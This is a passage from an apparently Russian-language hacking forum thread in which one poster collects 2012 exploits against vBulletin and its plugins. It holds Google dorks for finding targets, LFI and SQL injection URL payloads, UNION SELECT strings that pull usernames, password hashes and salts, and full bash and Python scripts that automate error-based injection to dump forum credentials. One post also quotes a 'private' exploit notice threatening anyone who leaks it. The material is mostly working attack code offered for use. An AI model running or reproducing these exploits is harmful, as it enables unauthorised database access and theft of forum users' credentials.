    # Version : All Version
    #
    # Tested on : GNU/Linux Ubuntu - Windows Server - win7
    #
    # Dork : "Powered by Vbulletin 4.1.10"
    #
    ########################################################
    Expl0iT :

    Код:
    [TarGeT]/Patch/includes/functions_cron.php?nextitem=[Lfi]
     
    11 сен 2012
  16. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability


    • Author : IrIsT.Ir
    • Discovered By : Am!r
    • Home : http://IrIsT.Ir/forum
    • Software Link : http://www.Vbulletin.com/
    • Security Risk : High
    • Version : All Version
    • Tested on : GNU/Linux Ubuntu - Windows Server - win7
    • Dork : intext:"Powered By Vbulletin 4.1.12"

    Expl0iTs :
    Код:
    http://target.com/includes/blog_plugin_useradmin.php?do=usercss&amp;u=[Sql]
     
    21 сен 2012
  17. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability​


    Код:
    # Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection Vulnerability
    # Google Dork: No Dork
    # Date: 19/10/2012
    # Exploit Author: Juno_okyo
    # Vendor Homepage: http://hoiquantinhoc.com
    # Software Link:
    http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html
    # Version: vBulletin 3 & 4
    # Tested on: Windows 7
    #
    Vulnerability:

    SQL Injection was found in ChangUonDyU Advanced Statistics.

    Query on ajax.php

    Exploitation:

    Код:
    ajax.php?do=inforum&listforumid=100) UNION SELECT
    1,concat_ws(0x7c,user(),database(),version()),3,4,5,6,7,8,9,10-- -&result=20
    or:

    Код:
    ajax.php?do=inforum&listforumid=100) UNION SELECT
    1,2,3,4,5,6,concat_ws(0x7c,username,password,salt),8,9,10,11 from user
    where userid=1-- -&result=20
    Ex:

    Код:
    http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20
    (c) exploit-db.com​

    Добавлено через 13 минут
    vBGarage Pro vBulletin Mod - SQL Injection


    Код:
    #!/bin/bash
    ##############
    # MegaManSec #
    ##############
    ##############
    #  InterNot  #
    ##############
    echo "MegaManSec @ www.internot.info"
    echo "White-Hat Hacker  "
    if [ -z "$1" ]; then
    	echo "Usage: $0 http://link.to/forum/"
    	echo "Example: $0 http://f800riders.org/forum/"
    	exit 1
    fi
    	tmpfile="/tmp/vbg.tmp"
    	echo "securitytoken=guest&s=&searchuser=&search_year=1&model_year=') IN (select (1) from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where usergroupid LIKE '%6%' LIMIT 1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''=''#&make_id=&model_id=&trim_id=&club_id=&category_id=&engine_type=&veh_class=&manufact_id=&product_id=&search_logic=any&do=search_results&submit=%3ESearch" > "$tmpfile"
    
    	sqldata=`curl -s -X POST -d @"$tmpfile" "$1"garage.php?do=search | grep -i 'MYSQL Error'| awk -F "Duplicate entry" '{print $2}' | awk -F "for key" '{print $1}'| w3m -dump -T text/html`
    if [ -z "$sqldata" ]; then
    	echo "Either not vulnerable, or is not showing the hash+pwd, try manually if you don't believe"
    	exit 1
    fi
    echo "Here is username:hash:salt"
    echo "$sqldata"
    rm "$tmpfile"
    exit 0
     
    Последнее редактирование: 5 ноя 2012
    5 ноя 2012
  18. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    vBulletin vBSEO SQL Injection Vulnerability

    Код:
    ######################################################
    # vBulletin vBSEO SQL Injection Vulnerability (PRIVATE) 4/12/2012
    # Remember leaking means instant ban and dox. ^^
    ######################################################
    #
    # Security risk:   Very High
    #
    # Effective on:    All versions
    #
    # Exploit:         http://[target]/members/x.html?userid=[sql]
    #
    # Software link:   http://vbseo.com/
    #
    #######################################################
    #
    # Found by:        iV3cT0r
    #
    # Vendor notified: No
    #
    #######################################################
    #
    # Plugin patch---
    # PHP Code:        $vbulletin->db->query_write(rtrim($_GET['userid']));
    # Execution order: 5
    # Hook location:   global_start
    #
    ######################################################
     
    12 ноя 2012
    1 человеку нравится это.
  19. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    vBulletin vBay <=1.1.9 Error-Based SQL Injection


    Код:
    #!/usr/bin/env python -W ignore::DeprecationWarning
      
    """
      
       VBay <= 1.1.9 - Remote Error based SQL Injection
        
                            ~ Author:  Dan UK
                            ~ Contact: http://www.hackforums.net/member.php?action=profile&uid=817599
                            ~ Date:    10/11/12
              
               DETAILS
               Among a couple of other unsanitized parameters used within an INSERT INTO statement
               on line 424-460 of /upload/vbay.php, the "type" variable can be used to exploit this
               using error based sql injection, making it possible to grab anything the user wants
               from the vbulletin database (and any others if accessible).
        
               As said above, the affected file is /upload/vbay.php.
               On line 418, we can see the $vbulletin->input variable "type"
               being assigned with the datatype NO_HTML. Using this data type
               allows malicious attacks to still be executed.
        
               At line 448, it is used within the insert into statement,
               without any sanitization.
        
              
               POC
               - You will need to register an account.
               - Go to [site]/vbay.php?do=postauction.
               - Modify your post data using a tool such as live http headers, or setting it directly
                 using a tool such as curl/wget to grab the source.
               - Set the value of "type=" to something that will cause an error, such as a single tick.
                 Example: POST type='
               - If, when you view the source, you get a vbulletin error message surrounded within
                 comments, then it's possible to go ahead. If not, blind is the way forward.
        
               If error based is possible for you, you could either just simply look at some tutorials
               and go from there, or run the script below which will grab the details for the user specified.
        
               Have fun.
      
    """
      
    from optparse import OptionParser, OptionGroup
    from argparse import OPTIONAL
    import cookielib, urllib, urllib2, httplib
    import sys, md5, urlparse, re
      
    """
    OPTION PARSER/USAGE
    """
    usage = "./%prog [options]\n"
    usage += "-h or --help for more help."
      
    # Required options
    parser = OptionParser(usage=usage)
    parser.add_option("-u", dest="username",
                      help="Working username to the target forum.")
    parser.add_option("-p", dest="password",
                      help="Working password to the target forum.")
    parser.add_option("--host", dest="forumpath",
                      help="FULL path to the vbulletin forum.")
      
    # Optional Options
    optional = OptionGroup(parser, "Optional arguments")
    optional.add_option("-f", dest="userid",
                        help="User ID to grab. Default is 1.", metavar="USERID",
                        default="1")
    optional.add_option("-s", dest="prefix",
                        help="Set the prefix of the vBulletin forum\
                             Default is null.", default="")
    optional.add_option("-g", "--grab-prefix", dest="grabprefix",
                        help="Grab the tables prefix.", default=False,
                        action="store_true")
      
    parser.add_option_group(optional)
      
    (options, args) = parser.parse_args()
      
    if not options.forumpath:
        parser.error('[-] No forum path given.')
    if not options.username:
        parser.error('[-] No username given.')
    if not options.password:
        parser.error('[-] No password given.')
      
      
    """
    HEADER
    """
    def Header():
        header = """
    # # # # # # # # # # # # # # # # # #
    # VBay <=1.1.9 SQL Injection 0day #
    #            By Dan_UK            #
    # # # # # # # # # # # # # # # # # #\n"""
        return header
      
    """
    LOGIN AND EXTRACT NEEDED COOKIES
    """
    def loginForum(forum, username, password):
        md5pass = md5.md5(password).hexdigest()
        postdata = urllib.urlencode({
                    'do':'login',
                    'vb_login_md5password':md5pass,
                    'vb_login_username':username,
                    'cookieuser':'1'
                   })
        cookie_jar = cookielib.CookieJar()
        handeler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
        handeler.open(forum + "login.php?do=login", postdata)
        
        for cookie in cookie_jar:
            if "bbsessionhash" in str(cookie):
                return cookie_jar
      
      
    """
    CHECK VBAY EXISTS
    """
    def get_server_status_code(forum):
        host, path = urlparse.urlparse(forum)[1:3]
        try:
            conn = httplib.HTTPConnection(host)
            conn.request('HEAD', path)
            return conn.getresponse().status
        except StandardError:
            return None
      
    def checkExists(forum):
        good_codes = [httplib.OK, httplib.FOUND, httplib.MOVED_PERMANENTLY]
        return get_server_status_code(forum + "vbay.php") in good_codes
      
    """
    CHECK DEBUG MODE ENABLED
    """
    def checkVuln(forum, cookie_jar):
        payload = {
                   "POST":
                          urllib.urlencode({"type":"'"}),
                   "SCRIPT":"vbay.php?do=postauction"
                  }
        try:
            handeler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
            resp = handeler.open(forum + payload["SCRIPT"], payload["POST"])
        except urllib2.HTTPError as e:
            e_mesg = e.read()
            
        if "MySQL Error" in e_mesg:
            return True
      
    """
    GRAB PREFIX
    """
    def grabPrefix(forum, cookie_jar):
        payload = {
                   "SQL":urllib.urlencode({"type":"'"}),
                   "SCRIPT":"vbay.php?do=postauction"
                  }
        
        try:
            handler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
            resp = handler.open(forum + payload["SCRIPT"], payload["SQL"])
        except urllib2.HTTPError as e:
            e_mesg = e.read()
        
        prefix = re.search('INTO(.*)vbay_items', e_mesg).group(1)
        return prefix
            
        
      
    """
    GRAB INFO
    """
    def grabInfo(forum, cookie_jar, prefix, userid):
        # 0x2564656c696d312125 = "%delim1!%"
        payload = {
                    "SQL":
                          urllib.urlencode({
                           "type":"' and (select 1 from (select count(*),concat((select(select concat(cast(concat(0x2564656c696d312125,COL_NAME,0x2564656c696d312125) as char),0x7e)) from " + str(prefix) + "user WHERE userid=" + str(userid) + " limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or ''='",
                          }),
                   "COLS": ["username", "password", "salt"],
                   "SCRIPT":"vbay.php?do=postauction"
                  }
        
        info = []
        for col in payload["COLS"]:
            print "[!] Grabbing the %s" % col
            try:
                handler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
                resp = handler.open(forum + payload["SCRIPT"], payload["SQL"].replace("COL_NAME", col))
            except urllib2.HTTPError as e:
                e_mesg = e.read()
                info.append(e_mesg.split("%delim1!%")[1].strip("\n"))
        return info
        
        
    """
    MAIN
    """
    def main():
         username = options.username
         password = options.password
         forum = options.forumpath
         userid = options.userid
         prefix = options.prefix
          
         if forum.lower()[:7] != "http://":
             if forum.lower()[:8] == "https://":
                 forum = forum.replace("https://", "http://")
         if forum[-1:] != "/":
             forum = forum + "/"
                  
         print Header()
          
         print "[!] Trying to login to: " + forum
         if loginForum(forum, username, password):
             cookies = loginForum(forum, username, password)
             print "[+] Login works."
         else:
             print "[-] Login doesn't work. (" + username + ":" + password + ")"
             print "[-] Exiting."
             sys.exit()
              
         print "\n[!] Checking if vBay is installed.."
         if (checkExists(forum)):
             print "[+] vBay was found. Continuing with exploit."
         else:
             print "[-] vBay could no be found. (" + forum + "/vbay.php)"
             print "[-] Exiting."
             sys.exit()
              
         print "\n[!] Checking if debug mode is enabled.."
         if checkVuln(forum, cookies):
             print "[+] Debug mode is enabled, exploit is possible."
              
         if options.grabprefix == True:
             print "\n[!] Grabbing prefix."
             print "[+] Prefix found:" + grabPrefix(forum, cookies)   
             sys.exit()
              
              
         print "\n[!] Grabbing info.\n"
         info = grabInfo(forum, cookies, prefix, userid)
         print "\n[+] Formatting for ease of view."
         print "\n\n[+] Username: " + info[0]
         print "[+] Password: " + info[1]
         print "[+] Salt: " + info[2]
         print "\n\nThanks for using my tool."
              
          
    if __name__ == "__main__":
        main()
    
     
    13 ноя 2012
  20. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    29 ноя 2012
    1 человеку нравится это.

Поделиться этой страницей

Загрузка...